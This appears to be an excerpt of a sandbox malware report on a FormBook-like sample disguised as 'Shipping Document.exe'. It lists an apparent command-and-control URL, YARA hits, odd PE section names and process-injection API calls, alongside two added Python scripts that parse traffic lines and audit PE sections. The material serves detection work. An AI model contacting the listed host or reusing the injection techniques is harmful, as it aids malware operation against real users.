                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Mar 2025 04:42:21 GMTServer: Apache/2Content-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Mar 2025 04:42:24 GMTServer: Apache/2Content-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: Shipping Document.exe, 00000000.00000002.1268642762.0000000002701000.00000004.00000800.00020000.00000000.sdmp, KOENBvWt.exe, 0000000C.00000002.1371331609.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, KOENBvWt.exe, 0000000C.00000002.1371331609.000000000304A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: KOENBvWt.exe, 0000000C.00000002.1371331609.000000000304A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/CRUDDataSet.xsd
                Source: KOENBvWt.exe, 0000000C.00000002.1371331609.000000000304A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/CRUDDataSet1.xsd
                Source: Shipping Document.exe, 00000000.00000002.1268642762.0000000002701000.00000004.00000800.00020000.00000000.sdmp, KOENBvWt.exe, 0000000C.00000002.1371331609.0000000002B91000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/CRUDDataSet1.xsd?0ZM
                Source: Shipping Document.exe, 00000000.00000002.1268642762.0000000002701000.00000004.00000800.00020000.00000000.sdmp, KOENBvWt.exe, 0000000C.00000002.1371331609.000000000304A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/CRUDDataSet1.xsdIData
                Source: rtO5LARBHjW9nKZi.exe, 00000015.00000002.3704953659.0000000005D39000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.rbopisalive.cyou
                Source: rtO5LARBHjW9nKZi.exe, 00000015.00000002.3704953659.0000000005D39000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.rbopisalive.cyou/6m32/
                Source: xcopy.exe, 00000016.00000002.3705262966.0000000008648000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: xcopy.exe, 00000016.00000002.3705262966.0000000008648000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: rtO5LARBHjW9nKZi.exe, 00000015.00000002.3702891578.000000000429C000.00000004.80000000.00040000.00000000.sdmp, xcopy.exe, 00000016.00000002.3702794231.0000000004B3C000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
                Source: xcopy.exe, 00000016.00000002.3705262966.0000000008648000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: xcopy.exe, 00000016.00000002.3705262966.0000000008648000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: xcopy.exe, 00000016.00000002.3705262966.0000000008648000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: xcopy.exe, 00000016.00000002.3705262966.0000000008648000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: xcopy.exe, 00000016.00000002.3705262966.0000000008648000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: xcopy.exe, 00000016.00000002.3688129480.0000000003534000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: xcopy.exe, 00000016.00000002.3688129480.0000000003534000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: xcopy.exe, 00000016.00000002.3688129480.0000000003534000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: xcopy.exe, 00000016.00000002.3688129480.0000000003534000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: xcopy.exe, 00000016.00000003.1618500095.000000000862A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: xcopy.exe, 00000016.00000002.3705262966.0000000008648000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
                Source: rtO5LARBHjW9nKZi.exe, 00000015.00000002.3702891578.0000000003C54000.00000004.80000000.00040000.00000000.sdmp, xcopy.exe, 00000016.00000002.3702794231.00000000044F4000.00000004.10000000.00040000.00000000.sdmp, xcopy.exe, 00000016.00000002.3705040296.0000000006B80000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.1732049083.000000001F574000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: https://www.google.com
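The HTTP 404 responses listed above share a Server banner, a 315-byte body and a two-to-three-second cadence. That is what a FormBook check-in loop looks like from the wire: the sample walks a list of C2 URLs, most of which are decoys that answer with a stock error page, so the shape of the response stream says more than any single reply. The script below is an added example and is not part of the Joe Sandbox report. It parses the report's "HTTP traffic detected" lines exactly as the text export runs the header fields together, recovers the body from the hex dump, checks it against Content-Length, and flags bursts of near-identical responses. The input lines are constructed from the timestamps and Server values above with a 19-byte body standing in for the 315-byte Apache page; the burst thresholds (three responses within ten seconds) are assumptions.

```python
"""Parse Joe Sandbox 'HTTP traffic detected' lines and flag response bursts.

Added example, not part of the Joe Sandbox report. Sample lines are constructed
in the text export's layout (labels glued to the preceding value), using the
report's timestamps and Server banners but a short constructed body.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Labels that the text export runs together without separators.
FIELDS = ("Date", "Server", "Content-Length", "Connection", "Content-Type",
          "Data Raw", "Data Ascii")
_LABELS = "|".join(re.escape(f) for f in FIELDS)
STATUS_RE = re.compile(r"HTTP traffic detected: HTTP/1\.[01] (?P<status>\d{3})")
# A value ends where the next known label starts, or at end of line.
FIELD_RE = re.compile(rf"(?P<name>{_LABELS}): (?P<value>.*?)(?=(?:{_LABELS}): |$)", re.S)
DATE_FORMAT = "%a, %d %b %Y %H:%M:%S GMT"


def parse_response_line(line):
    """Return a response record for one 'HTTP traffic detected' line, else None."""
    m = STATUS_RE.search(line)
    if m is None:
        return None
    fields = {f.group("name"): f.group("value") for f in FIELD_RE.finditer(line, m.end())}
    body = bytes.fromhex(fields.get("Data Raw", ""))
    declared = int(fields.get("Content-Length", len(body)))
    # The hex dump is the faithful copy; the ASCII rendering drops newlines,
    # so the two are compared with all whitespace removed.
    ascii_view = "".join(fields.get("Data Ascii", "").split())
    return {
        "status": int(m.group("status")),
        "time": datetime.strptime(fields["Date"], DATE_FORMAT),
        "server": fields.get("Server", "?"),
        "length": declared,
        "body_ok": len(body) == declared
                   and "".join(body.decode("latin-1").split()) == ascii_view,
    }


def find_bursts(responses, min_count=3, max_gap=timedelta(seconds=10)):
    """Cluster responses by (server, status, length); report tight clusters.

    Thresholds are assumptions. A FormBook check-in loop shows up as several
    byte-identical error pages, seconds apart, sharing only a Server banner.
    """
    groups = defaultdict(list)
    for r in responses:
        groups[(r["server"], r["status"], r["length"])].append(r["time"])
    bursts = []
    for (server, status, length), times in groups.items():
        times.sort()
        clusters, current = [], [times[0]]
        for previous, now in zip(times, times[1:]):
            if now - previous <= max_gap:
                current.append(now)
            else:
                clusters.append(current)
                current = [now]
        clusters.append(current)
        for cluster in clusters:
            if len(cluster) >= min_count:
                bursts.append({"server": server, "status": status, "length": length,
                               "count": len(cluster), "first": cluster[0].isoformat(),
                               "span_s": int((cluster[-1] - cluster[0]).total_seconds())})
    return sorted(bursts, key=lambda b: b["first"])


def triage(lines):
    """Parse every response line of a report excerpt; return (responses, bursts)."""
    responses = [r for r in map(parse_response_line, lines) if r is not None]
    return responses, find_bursts(responses)


# Constructed body "<h1>Not Found</h1>\n" (19 bytes) in place of the real 315-byte page.
_BODY_HEX = "3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a"


def _report_line(date, server):
    return ("Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Found"
            f"Date: {date} GMTServer: {server}Content-Length: 19Connection: close"
            f"Content-Type: text/html; charset=iso-8859-1Data Raw: {_BODY_HEX} "
            "Data Ascii: <h1>Not Found</h1>")


SAMPLE_LINES = [
    _report_line("Thu, 06 Mar 2025 04:40:56", "Apache"),
    _report_line("Thu, 06 Mar 2025 04:40:59", "Apache"),
    _report_line("Thu, 06 Mar 2025 04:41:01", "Apache"),
    _report_line("Thu, 06 Mar 2025 04:41:04", "Apache"),
    _report_line("Thu, 06 Mar 2025 04:42:16", "Apache/2"),
    _report_line("Thu, 06 Mar 2025 04:42:18", "Apache/2"),
    _report_line("Thu, 06 Mar 2025 04:42:21", "Apache/2"),
    _report_line("Thu, 06 Mar 2025 04:42:24", "Apache/2"),
    # A non-HTTP indicator line from the same section; it must be skipped.
    "Source: KOENBvWt.exe, 0000000C.00000002.1371331609.000000000304A000.00000004."
    "00000800.00020000.00000000.sdmpString found in binary or memory: "
    "http://tempuri.org/CRUDDataSet.xsd",
]

if __name__ == "__main__":
    responses, bursts = triage(SAMPLE_LINES)
    print(f"{len(responses)} responses parsed, {len(bursts)} burst(s)")
    for b in bursts:
        print(b)
```

Run against a full text export, the same `triage()` call takes the whole file's lines; the hostnames are not in these response lines, so the grouping key is deliberately the server banner, status and body length rather than a destination.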

                E-Banking Fraud

                Source: Yara match File source: 10.2.Shipping Document.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match File source: 10.2.Shipping Document.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 0000000A.00000002.1435018247.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000016.00000002.3687248383.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000015.00000002.3704953659.0000000005CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000016.00000002.3701996615.0000000003900000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 0000000A.00000002.1436402174.0000000000E70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000016.00000002.3699622847.0000000003630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000015.00000002.3701837200.0000000002C80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 0000000A.00000002.1438223772.0000000001420000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                Source: initial sample Static PE information: Filename: Shipping Document.exe
                Source: Shipping Document.exe Static PE information: section name: taM%C#%u
                Source: KOENBvWt.exe.0.dr Static PE information: section name: taM%C#%u
                Source: Shipping Document.exe Static PE information: section name:
                Source: KOENBvWt.exe.0.dr Static PE information: section name:
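Two of the indicators above come straight from the PE section table: a section named taM%C#%u and a section with an empty name, present in both the submitted file and the dropped KOENBvWt.exe. The script below is an added example and is not the Joe Sandbox report's own detection logic. It reads the section table directly from the headers (no pefile dependency) and reports nameless sections, names that use characters outside the usual set, and sections that are both writable and executable; the last check is not one of the report's indicators, only a companion check an analyst usually runs at the same time. Since the sample itself is not reproduced on this page, the input is a constructed minimal PE32 image with three sections, and the allowed-character set is an assumption.

```python
"""Audit PE section names as the 'section name' indicators above do.

Added example; not the Joe Sandbox report's own logic. The PE image inspected
here is constructed below because the sample is not reproduced on this page.
"""
import string
import struct

IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000
# Assumption: characters used in section names from mainstream linkers and packers.
ALLOWED_NAME_CHARS = set(string.ascii_letters + string.digits + "._$")


def parse_sections(data):
    """Return one dict per IMAGE_SECTION_HEADER, read straight from the headers."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", data, coff + 2)[0]
    size_of_optional = struct.unpack_from("<H", data, coff + 16)[0]
    table = coff + 20 + size_of_optional
    if table + 40 * num_sections > len(data):
        raise ValueError("section table runs past end of file")
    sections = []
    for index in range(num_sections):
        off = table + 40 * index
        raw_name = data[off:off + 8]
        vsize, vaddr, raw_size, raw_ptr = struct.unpack_from("<IIII", data, off + 8)
        characteristics = struct.unpack_from("<I", data, off + 36)[0]
        sections.append({
            "index": index,
            # Names are NUL-padded to 8 bytes and need not be NUL-terminated.
            "name": raw_name.rstrip(b"\0").decode("latin-1"),
            "virtual_address": vaddr, "virtual_size": vsize,
            "raw_size": raw_size, "raw_pointer": raw_ptr,
            "characteristics": characteristics,
        })
    return sections


def audit_sections(data):
    """Return (section index, finding) pairs for the section-table checks."""
    findings = []
    for s in parse_sections(data):
        if s["name"] == "":
            findings.append((s["index"], "nameless section"))
        elif any(c not in ALLOWED_NAME_CHARS for c in s["name"]):
            findings.append((s["index"], f"section name with special chars: {s['name']!r}"))
        if s["characteristics"] & IMAGE_SCN_MEM_EXECUTE and s["characteristics"] & IMAGE_SCN_MEM_WRITE:
            findings.append((s["index"], "section is both writable and executable"))
    return findings


def _section_header(name, vaddr, size, characteristics):
    # IMAGE_SECTION_HEADER: Name[8], VirtualSize, VirtualAddress, SizeOfRawData,
    # PointerToRawData, PointerToRelocations, PointerToLinenumbers,
    # NumberOfRelocations, NumberOfLinenumbers, Characteristics.
    return struct.pack("<8sIIIIIIHHI", name, size, vaddr, size, 0x400, 0, 0, 0, 0, characteristics)


def build_sample_pe():
    """Constructed minimal PE32 header set mirroring the report's section names."""
    sections = [
        _section_header(b".text", 0x1000, 0x1000, 0x60000020),     # code, read + execute
        _section_header(b"taM%C#%u", 0x2000, 0x1000, 0xE0000040),  # name from the report, RWX
        _section_header(b"", 0x3000, 0x1000, 0xC0000040),          # nameless, read + write
    ]
    dos_header = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", 0x40)  # e_lfanew = 0x40
    coff_header = struct.pack("<HHIIIHH", 0x014C, len(sections), 0, 0, 0, 0xE0, 0x0102)
    optional_header = struct.pack("<H", 0x10B) + b"\0" * (0xE0 - 2)    # PE32 magic, rest zeroed
    return dos_header + b"PE\0\0" + coff_header + optional_header + b"".join(sections)


if __name__ == "__main__":
    for index, finding in audit_sections(build_sample_pe()):
        print(f"section {index}: {finding}")
```

To run this over the real files, pass `open(path, "rb").read()` for both the submitted sample and the dropped copy; the report shows the same two section-name findings for each, which is expected when the dropped file is a copy of the original rather than a rebuilt binary.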
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 0_2_099735F8 NtUnmapViewOfSection, 0_2_099735F8
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 0_2_099735F0 NtUnmapViewOfSection, 0_2_099735F0
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0042C953 NtClose, 10_2_0042C953
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01142B60 NtClose, LdrInitializeThunk, 10_2_01142B60
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01142DF0 NtQuerySystemInformation, LdrInitializeThunk, 10_2_01142DF0
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01142C70 NtFreeVirtualMemory, LdrInitializeThunk, 10_2_01142C70
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_011435C0 NtCreateMutant, LdrInitializeThunk, 10_2_011435C0
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01144340 NtSetContextThread, 10_2_01144340
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01144650 NtSuspendThread, 10_2_01144650
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01142B80 NtQueryInformationFile, 10_2_01142B80
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01142BA0 NtEnumerateValueKey, 10_2_01142BA0
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01142BF0 NtAllocateVirtualMemory, 10_2_01142BF0
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01142BE0 NtQueryValueKey, 10_2_01142BE0
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01142AB0 NtWaitForSingleObject, 10_2_01142AB0
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01142AD0 NtReadFile, 10_2_01142AD0
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01142AF0 NtWriteFile, 10_2_01142AF0
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01142D10 NtMapViewOfSection, 10_2_01142D10
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01142D00 NtSetInformationFile, 10_2_01142D00
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01142D30 NtUnmapViewOfSection, 10_2_01142D30
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01142DB0 NtEnumerateKey, 10_2_01142DB0
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01142DD0 NtDelayExecution, 10_2_01142DD0
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01142C00 NtQueryInformationProcess, 10_2_01142C00
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01142C60 NtCreateKey, 10_2_01142C60
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01142CA0 NtQueryInformationToken, 10_2_01142CA0
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01142CC0 NtQueryVirtualMemory, 10_2_01142CC0
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01142CF0 NtOpenProcess, 10_2_01142CF0
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01142F30 NtCreateSection, 10_2_01142F30
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01142F60 NtCreateProcessEx, 10_2_01142F60
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01142F90 NtProtectVirtualMemory, 10_2_01142F90
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01142FB0 NtResumeThread, 10_2_01142FB0
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01142FA0 NtQuerySection, 10_2_01142FA0
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01142FE0 NtCreateFile, 10_2_01142FE0
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01142E30 NtWriteVirtualMemory, 10_2_01142E30
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01142E80 NtReadVirtualMemory, 10_2_01142E80
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01142EA0 NtAdjustPrivilegesToken, 10_2_01142EA0
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01142EE0 NtQueueApcThread, 10_2_01142EE0
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01143010 NtOpenDirectoryObject, 10_2_01143010
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01143090 NtSetValueKey, 10_2_01143090
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_011439B0 NtGetContextThread, 10_2_011439B0
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01143D10 NtOpenProcessToken, 10_2_01143D10
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01143D70 NtOpenThread, 10_2_01143D70
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 0_2_00B52830 0_2_00B52830
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 0_2_00B50871 0_2_00B50871
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 0_2_00B54970 0_2_00B54970
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 0_2_00B53AC8 0_2_00B53AC8
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 0_2_00B52B19 0_2_00B52B19
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 0_2_00B51CEF 0_2_00B51CEF
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 0_2_00B530E0 0_2_00B530E0
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 0_2_00B56410 0_2_00B56410
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 0_2_00B56400 0_2_00B56400
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 0_2_00B53560 0_2_00B53560
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 0_2_00B527FE 0_2_00B527FE
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 0_2_00B56720 0_2_00B56720
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 0_2_00B5489C 0_2_00B5489C
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 0_2_00B55898 0_2_00B55898
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 0_2_00B55888 0_2_00B55888
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 0_2_00B56AA0 0_2_00B56AA0
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 0_2_00B56A90 0_2_00B56A90
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 0_2_00B56CB0 0_2_00B56CB0
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 0_2_00B56CC0 0_2_00B56CC0
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 0_2_00B56F50 0_2_00B56F50
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 0_2_00B56F40 0_2_00B56F40
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 0_2_07FB1678 0_2_07FB1678
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 0_2_07FBD548 0_2_07FBD548
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 0_2_07FB4810 0_2_07FB4810
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 0_2_07FBD539 0_2_07FBD539
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 0_2_07FBE1D8 0_2_07FBE1D8
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 0_2_07FBE1BE 0_2_07FBE1BE
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 0_2_07FB0EA8 0_2_07FB0EA8
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 0_2_07FB0E45 0_2_07FB0E45
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 0_2_094A1AB8 0_2_094A1AB8
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 0_2_094A1AAC 0_2_094A1AAC
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 0_2_099780C9 0_2_099780C9
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 0_2_09970C80 0_2_09970C80
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 0_2_099710B7 0_2_099710B7
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 0_2_099710B8 0_2_099710B8
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 0_2_09970847 0_2_09970847
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 0_2_09970848 0_2_09970848
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 0_2_09972790 0_2_09972790
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 0_2_09979F50 0_2_09979F50
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 0_2_09A42C40 0_2_09A42C40
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 0_2_09A411D1 0_2_09A411D1
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 0_2_09A405F0 0_2_09A405F0
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 0_2_09A4A4F0 0_2_09A4A4F0
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 0_2_09A407B9 0_2_09A407B9
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 0_2_09A43700 0_2_09A43700
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 0_2_09A419B0 0_2_09A419B0
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 0_2_09A419C0 0_2_09A419C0
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 0_2_09A41968 0_2_09A41968
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 0_2_09A40026 0_2_09A40026
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 0_2_09A40040 0_2_09A40040
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 0_2_09A4C390 0_2_09A4C390
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 0_2_09A405E0 0_2_09A405E0
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 0_2_09A41698 0_2_09A41698
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 0_2_09A41658 0_2_09A41658
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 0_2_09BE7540 0_2_09BE7540
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 0_2_09BE12A0 0_2_09BE12A0
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 0_2_09BE752A 0_2_09BE752A
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 0_2_09BE9CF0 0_2_09BE9CF0
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_004187C3 10_2_004187C3
